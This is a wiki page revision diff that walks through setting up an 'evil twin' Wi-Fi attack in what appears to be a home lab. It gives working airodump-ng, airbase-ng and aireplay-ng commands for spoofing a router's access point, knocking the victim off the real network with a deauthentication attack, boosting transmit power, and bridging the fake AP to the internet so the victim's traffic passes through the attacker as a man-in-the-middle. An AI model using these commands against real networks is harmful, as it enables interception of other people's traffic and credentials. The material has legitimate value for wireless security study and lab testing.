Evil Twin/Setup: Difference between revisions
From charlesreid1
| Line 138: | Line 138: | ||
But we need to provide a bridge back to the Good Twin, so that we can continue to keep the Sheep's internet connection alive and going through the Evil Twin. | But we need to provide a bridge back to the Good Twin, so that we can continue to keep the Sheep's internet connection alive and going through the Evil Twin. | ||
On mars, the attack machine, you will have an | ===Bridging Devices=== | ||
On mars, the attack machine, where you ran airbase-ng, you will have an new interface created by airbase-ng that is called at0. If at0 is bridged to a working internet connection, then voila, your client has a "wireless" connection through "their" router. | |||
Our evil twin is on wlan1, our sheep's network connection is on at0, and our second wireless card or ethernet port with an internet connection is on eth0. | Our evil twin is on wlan1, our sheep's network connection is on at0, and our second wireless card or ethernet port with an internet connection is on eth0. | ||
We'll build a bridge to connect an internet-enabled network interface (eth0) to the sheep's network connection (at0). | |||
Note that at0 and eth0 DO NOT need to be the same router that's being spoofed. That means, you can spoof router A, and bridge a connection from the evil twin of router A to a different internet connection at router B. (And if that connection on router B is faster, the Sheep will probably prefer that you Man-In-The-Middle them!) | Note that at0 and eth0 DO NOT need to be the same router that's being spoofed. That means, you can spoof router A, and bridge a connection from the evil twin of router A to a different internet connection at router B. (And if that connection on router B is faster, the Sheep will probably prefer that you Man-In-The-Middle them!) | ||
==Wayne's World== | ==Wayne's World== | ||
Revision as of 05:24, 23 August 2015
Setup
The Machines
A note on machine names.
kronos is the sheep.
mars is the attacker.
Goodies
On the attacking machine:
mars $ apt-get install bridge-utils
Procedure
Connect Sheep to Good Twin
First step is to connect the sheep to the good twin:
$ iw dev wlan1 scan $ wpa_supplicant -D nl80211,wext -i wlan1 -c <(wpa_passphrase "YourESSIDHere" "YourPassphraseHere")
Device Information
Get info about your devices:
mars $ iwconfig
AP Information
Get info about the Good Twin AP:
mars $ airodump-ng wlan0
Create Evil Twin (Window 1)
To create our Evil Twin AP, we'll use airbase:
mars $ airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>
or, to make it shorter,
mars $ airbase-ng --essid <ESSID of network> <interface>
So for example, we might listen for the Good Twin router on channel 11, see it, then create our base station:
mars $ airbase-ng -a AA:BB:CC:DD:EE:FF --essid "HomeRouter" -c 10 wlan1 21:39:29 Created tap interface at0 21:39:29 Trying to set MTU on at0 to 1500 21:39:29 Trying to set MTU on wlan1 to 1800 21:39:29 Access Point with BSSID AA:BB:CC:DD:EE:FF started.
Make Evil Twin Obnoxious
THIS STEP IS ENTIRELY OPTIONAL AND NOT RECOMMENDED.
To make sure that the Sheep only hears the Evil Twin, you can crank up the power:
mars $ iwconfig wlan0 txpower 27
WARNING: You can break the law by transmitting at too high a power. Know the laws. You are responsible for your actions and you are responsible for not breaking the law.
DUH.
Anyway...
Instrumenting the Network
No experiment in security would be any good if we weren't watching what was going on with the internals of the network!
I put a second wireless card on the sheep, and before the whole attack went down, I fired up wireshark and started a packet dump on the network to watch what was happening.
Deauth Sheep on Good Twin (Window 2)
Now, listen for the network from the attack platform. Make sure you don't use the same wireless card that you're using to run the air station!
mars $ airodump-ng -w eviltwin wlan0
Also, if we watch our airbase window, with the command we ran previously, we see some activity:
mars $ airbase-ng -a XXX --essid "Walrus" -c 11 wlan1 21:49:23 Created tap interface at0 21:49:23 Trying to set MTU on at0 to 1500 21:49:23 Access Point with BSSID XXX started. 21:53:08 Client XXX associated (WEP) to ESSID: "Walrus" 21:53:17 Client XXX associated (WEP) to ESSID: "Walrus" 21:53:27 Client XXX associated (unencrypted) to ESSID: "Walrus" 21:53:36 Client XXX associated (unencrypted) to ESSID: "Walrus"
Not sure what's going on there. We'll find out soon, I suppose.
Like a magnet, my Raspberry Pi and my iPhone both connected to the fake access point.
This may not even be necessary. Kick the Sheep off of the Good Twin router using aireplay's deauth attack:
mars $ aireplay-ng -0 1 -a <AP MAC Address> -c <Sheep MAC Address> wlan0
Once the sheep has been kicked off, it will begin to look for the Good Twin again. But the Evil Twin will be there instead.
Not sure about the output, but I think the sheep is connected to the Evil Twin.
Connecting Sheep to Evil Twin
The Sheep will begin to look for the Good Twin, will see the Evil Twin, and will connect to it.
Keeping Sheep Connected to Internet
Keep the sheep surfin the web, by creating a bridge.
Remember we created an evil twin access point with airbase-ng on wlan1, and the sheep has been kicked off the Good Twin and is now on the evil twin.
But we need to provide a bridge back to the Good Twin, so that we can continue to keep the Sheep's internet connection alive and going through the Evil Twin.
Bridging Devices
On mars, the attack machine, where you ran airbase-ng, you will have an new interface created by airbase-ng that is called at0. If at0 is bridged to a working internet connection, then voila, your client has a "wireless" connection through "their" router.
Our evil twin is on wlan1, our sheep's network connection is on at0, and our second wireless card or ethernet port with an internet connection is on eth0.
We'll build a bridge to connect an internet-enabled network interface (eth0) to the sheep's network connection (at0).
Note that at0 and eth0 DO NOT need to be the same router that's being spoofed. That means, you can spoof router A, and bridge a connection from the evil twin of router A to a different internet connection at router B. (And if that connection on router B is faster, the Sheep will probably prefer that you Man-In-The-Middle them!)